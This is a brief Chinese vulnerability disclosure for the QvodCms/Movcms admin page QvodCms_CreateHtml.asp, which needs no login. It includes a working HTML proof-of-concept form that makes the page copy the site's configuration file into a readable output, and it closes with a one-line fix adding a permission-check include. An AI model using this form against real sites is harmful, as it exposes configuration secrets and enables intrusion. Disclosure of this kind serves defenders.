后台的 QvodCms_CreateHtml. asp 不需要登陆即可访问
利用其中的 [生成自定义模板] 可以生成一个任意文件,文件内容,可以指向 网站的任何一个文件
<form method="post" action="http://域名/后台/QvodCms_CreateHtml.asp?action=other" target="msg1793">
<input name="jstype" type="hidden" value="Define">
<input name="jsname" type="hidden" value="Define">
自定义模板保存路径:<input name="cpath" type="text" value="wdtasdf. html " style="color:#FF0000">
<select name="Define" onChange="cpath.value=''+this.options[this.selectedIndex].value;">
<option value="Cache/QvodCms.Config.asp" selected="selected">Config</option>
</select> <input type='submit' value='生成自定义模板'>
</form>
<iframe style="z-index:1;visibility:inherit;width:100%;height:100px;" name="msg1793" frameborder="0" scrolling="yes"></iframe>
修复方案: 在文件中加入权限检测代码
<!--#include file="QvodCms_Check.asp"-->
查看更多关于Movcms不登陆查看文件源码 - 网站安全 - 自学php的详细内容...